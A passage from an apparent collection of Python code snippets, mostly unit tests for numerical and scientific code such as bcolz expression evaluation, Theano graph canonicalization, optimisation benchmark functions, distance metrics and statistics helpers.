coeff = [ max(-2.0, min(127/32., random.random() * 4 - 2)) for r in range(3) ]\n #print coeff, data\n self._check(coeff, data)", "def test03(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_pinter(self):\n fun = get_problem('pinter', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def _sparse_tanimotokernel(data_1, data_2):\n\n norm_1 = np.array(data_1.power(2).sum(axis=1).reshape(data_1.shape[0], 1))\n norm_2 = np.array(data_2.power(2).sum(axis=1).reshape(data_2.shape[0], 1))\n prod = data_1.dot(data_2.T).A\n\n divisor = (norm_1 + norm_2.T - prod) + np.finfo(data_1.dtype).eps\n result = prod / divisor\n return result", "def problem1(self, s):\n\n # Test with good inputs (4 points)\n x = np.array([1, 2])\n y = np.array([2, 2])\n points = self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")\n \n x = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n y = np.array([2, 6, 4, 8, 0, 2, 4, 7, 5, 11])\n points += self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")\n \n x = (np.random.random(100)-.5)*200\n y = (np.random.random(100)-.5)*200\n points += self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")*2\n \n # Test with bad inputs (1 point)\n x = np.array([1, 2])\n y = np.array([1, 2, 3])\n try:\n s.euclidean_metric(x, y)\n self.feedback += \"\\n\\teuclidean_metric() failed to raise a \"\n self.feedback += \"ValueError for vectors of different lengths\"\n except:\n points += 1\n\n return points", "def user_function(x, y):\r\n return x ** 2 + 2 * y ** 2", "def double(input):\r\n assert_array_equal = np.testing.assert_array_equal\r\n\r\n data, position, expected = input\r\n if expected is not None:\r\n assert_equal(data[position], expected)\r\n data[position] *= 2\r\n if expected is not None:\r\n assert_array_equal(data[position], 2 * expected)", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def test_equal4():\n x = np.array([[1, 2, 3]])\n y = np.array([[[[1, 2, 3], [1, 2, 3], [1, 2, 3]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_suite():\n test(sum_of_squares([2, 3, 4]) == 29)\n test(sum_of_squares([ ]) == 0)\n test(sum_of_squares([2, -3, 4]) == 29)", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_michalewicz(self):\n fun = get_problem('michalewicz', dimension=2, lower=0, upper=np.pi)\n self.assertAlmostEqual(fun(np.asarray([2.20, 1.57])), -1.8013, delta=1e-3)", "def test(self, x, y, z):\n return self.a*x + self.b*y + self.c*z + self.d", "def _SP(xdata, mx, ydata, my):\n if mx is None:\n mx = mean(xdata)\n if my is None:\n my = mean(ydata)\n return _generalised_sum(zip(xdata, ydata), lambda t: (t[0]-mx)*(t[1]-my))", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_whitley(self):\n fun = get_problem('whitley', self.dimension)\n self.assertEqual(fun(self.array2), 0.0)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_y_before_x(self):", "def test_mw_test(self):\r\n U, p = mw_test(self.x, self.y)\r\n self.assertFloatEqual(U, 123.5)\r\n self.assertTrue(0.02 <= p <= 0.05)", "def test_cressman_point(test_data):\n xp, yp, z = test_data\n\n r = 40\n\n obs_tree = cKDTree(list(zip(xp, yp)))\n\n indices = obs_tree.query_ball_point([30, 30], r=r)\n\n dists = dist_2(30, 30, xp[indices], yp[indices])\n values = z[indices]\n\n truth = 1.05499444404\n\n value = cressman_point(dists, values, r)\n\n assert_almost_equal(truth, value)", "def test__point_addition__given_point_and_vector__return_correct_point():\n assert Point((0, 1, 2)) + Vector((3, 4, 5)) == Point((3, 5, 7))", "def test_multiply(self):\n self.assertEqual(work_file.multiply(10, 5), 50)\n self.assertEqual(work_file.multiply(-1, 1), -1)\n self.assertEqual(work_file.multiply(-1, -1), 1)", "def test_expression(x, y, z):\n return x * y + y / z", "def test__point_subtraction__given_two_points__return_correct_vector():\n assert Point((0, 1, 2)) - Point((3, 4, 5)) == Vector((-3, -3, -3))", "def test_twoSum(self):\n self.assertEqual(twoSum([2, 7, 11, 15], 9), [0, 1])", "def test13(self):\n a = bcolz.ones((self.N, 1))\n b = bcolz.zeros(a.shape)\n b = bcolz.eval('a + b')\n self.assertEqual(b.sum(), self.N)", "def test_tensor_can_be_added_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n i, j = p.R_dumms[:2]\n x = IndexedBase('x')\n y = IndexedBase('y')\n\n tensor = dr.sum((i, p.R), x[i, j] * y[j, i])\n\n for res in [\n dr.einst(tensor),\n dr.sum((j, p.R), tensor)\n ]:\n assert res == dr.einst(x[i, j] * y[j, i])", "def test_add(x, y, expected):\n\n assert add(x, y) == pytest.approx(add(y, x)) == pytest.approx(expected)", "def test05(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_pearson_r_integer():\n da = xr.DataArray([0, 1, 2], dims=[\"time\"])\n assert pearson_r(da, da, dim=\"time\") == 1", "def _process(self, data: np.array) -> np.array:\n # pylint: disable=no-member\n return unp.sqrt(data[..., 0] ** 2 + data[..., 1] ** 2) * self.scale", "def test_array_mult(self):\n # pylint: disable=no-member\n ident_2_2 = np.array([[1, 1], [1, 1]])\n\n # Unit times a 2D array\n meter_ident_2_2 = self.meter * ident_2_2\n self.assertEqual(meter_ident_2_2[0][0], self.meter)\n self.assertEqual(meter_ident_2_2[0][1], self.meter)\n self.assertEqual(meter_ident_2_2[1][0], self.meter)\n self.assertEqual(meter_ident_2_2[1][1], self.meter)\n\n # 2D arrays multiplying each other (arrays multiply point by\n # point)\n matr_2_2 = np.array([[1, 2], [3, 4]])\n matr_mult = meter_ident_2_2 * matr_2_2\n self.assertEqual(matr_mult[0][0], self.meter)\n self.assertEqual(matr_mult[0][1], 2 * self.meter)\n self.assertEqual(matr_mult[1][0], 3 * self.meter)\n self.assertEqual(matr_mult[1][1], 4 * self.meter)", "def test__repeated_median(repeated_median):\n x, y, *_ = repeated_median\n assert repeated_median_slope(x, y) == 5.0", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def test_euclidean_distance_2dimension(self):\n dist_from_origin = lambda v: euclidean_distance([0, 0], v)\n\n # Do it first with known whole numbers\n self.assertEqual(5, dist_from_origin([3, 4]))\n self.assertEqual(5, dist_from_origin([-3, -4]))\n\n self.assertEqual(13, dist_from_origin([5, 12]))\n self.assertEqual(13, dist_from_origin([-5, -12]))\n\n self.assertEqual(15, dist_from_origin([9, 12]))\n self.assertEqual(15, dist_from_origin([-9, -12]))\n\n self.assertEqual(52, dist_from_origin([20, 48]))\n self.assertEqual(52, dist_from_origin([-20, -48]))\n\n # Next we will do it with a couple doubles, but we need\n # to round\n self.assertEqual(8.6023, round(dist_from_origin([5, 7]), 4))\n self.assertEqual(8.6023, round(dist_from_origin([-5, -7]), 4))\n\n self.assertEqual(13.0384, round(dist_from_origin([7, 11]), 4))\n self.assertEqual(13.0384, round(dist_from_origin([-7, -11]), 4))\n\n self.assertEqual(17.0294, round(dist_from_origin([11, 13]), 4))\n self.assertEqual(17.0294, round(dist_from_origin([-11, -13]), 4))\n\n dist_from_initial = lambda v: euclidean_distance([7, 23], v)\n\n # Do it first with known whole numbers\n self.assertEqual(5, dist_from_initial([7 + 3, 23 + 4]))\n self.assertEqual(5, dist_from_initial([7 - 3, 23 - 4]))\n\n self.assertEqual(13, dist_from_initial([7 + 5, 23 + 12]))\n self.assertEqual(13, dist_from_initial([7 - 5, 23 - 12]))\n\n self.assertEqual(15, dist_from_initial([7 + 9, 23 + 12]))\n self.assertEqual(15, dist_from_initial([7 - 9, 23 - 12]))\n\n self.assertEqual(52, dist_from_initial([7 + 20, 23 + 48]))\n self.assertEqual(52, dist_from_initial([7 + 20, 23 + 48]))\n\n # Next we do it with some doubles which require rounding\n self.assertEqual(8.6023, round(dist_from_initial([7 + 5, 23 + 7]), 4))\n self.assertEqual(8.6023, round(dist_from_initial([7 - 5, 23 - 7]), 4))\n\n self.assertEqual(13.0384, round(dist_from_initial([7 + 7, 23 + 11]), 4))\n self.assertEqual(13.0384, round(dist_from_initial([7 - 7, 23 - 11]), 4))\n\n self.assertEqual(17.0294, round(dist_from_initial([7 + 11, 23 + 13]), 4))\n self.assertEqual(17.0294, round(dist_from_initial([7 - 11, 23 - 13]), 4))", "def test_many_decimal_data_points(self):\r\n values = [3.14, 42, 2.718281, 1.41421, 10]\r\n expect_mean_result = 11.854498\r\n expected_sd_result = 15.36621\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertAlmostEqual(expect_mean_result, result['mean_result'], 4)\r\n self.assertAlmostEqual(expected_sd_result, result['sd_result'], 4)", "def test_multiple(self):\n df = self.df.copy()\n for renorm in [True, False]:\n with self.subTest(renorm=renorm):\n out = nan_weighted_compositional_mean(df.values, renorm=renorm)\n if renorm:\n self.assertTrue(np.allclose(np.sum(out, axis=-1), 1.0))", "def test_maths(self):\n\n # Test that basic integers work\n self.assertEqual(int(1) + int(1), int(2), \"Basic addition failed\")\n self.assertNotEqual(int(1) + int(1), int(3), \"Basic addition failed\")\n\n # Test doubles\n # FIXME: Deployment fails for some reason. Maybe bug in CPU? Commenting it out.\n # self.assertEqual(float(0.1) + float(0.2), float(0.3), \"Floating addition failed\")\n self.assertNotEqual(float(1) + float(1), float(3), \"Floating Addition failed\")", "def test_conservation(self):\n t, x_n, x_s, x_p = self.t, self.x_n, self.x_s, self.x_p\n\n current_param = self.model.param.current_with_time\n\n i_cell = self.param.process_symbol(current_param).evaluate(t=t)\n for x in [x_n, x_s, x_p]:\n np.testing.assert_array_almost_equal(\n self.i_s(t, x) + self.i_e(t, x), i_cell, decimal=2\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_n), self.i_s_n(t, x_n), decimal=3\n )\n np.testing.assert_array_almost_equal(\n self.i_s(t, x_p), self.i_s_p(t, x_p), decimal=3\n )", "def test_applyFunction(self):\n\n ptwise_linear = XYs1d(axes=XYs1d.defaultAxes(labelsUnits={\n XYs1dModule.yAxisIndex: ('crossSection', 'b'),\n XYs1dModule.xAxisIndex: ('energy_in', 'eV')}), data=[[1e-5, 1.0], [20.0e6, 21.0]])\n\n self.assertAlmostEqual(ptwise_linear.evaluate(15.0e6), 16.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(15.0e6), math.exp(-16.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.evaluate(1.0e6), 2.0)\n# self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: math.exp(-x), None).evaluate(1.0e6), math.exp(-2.0)) # This should work, but fails\n self.assertAlmostEqual(ptwise_linear.applyFunction(lambda x, y: 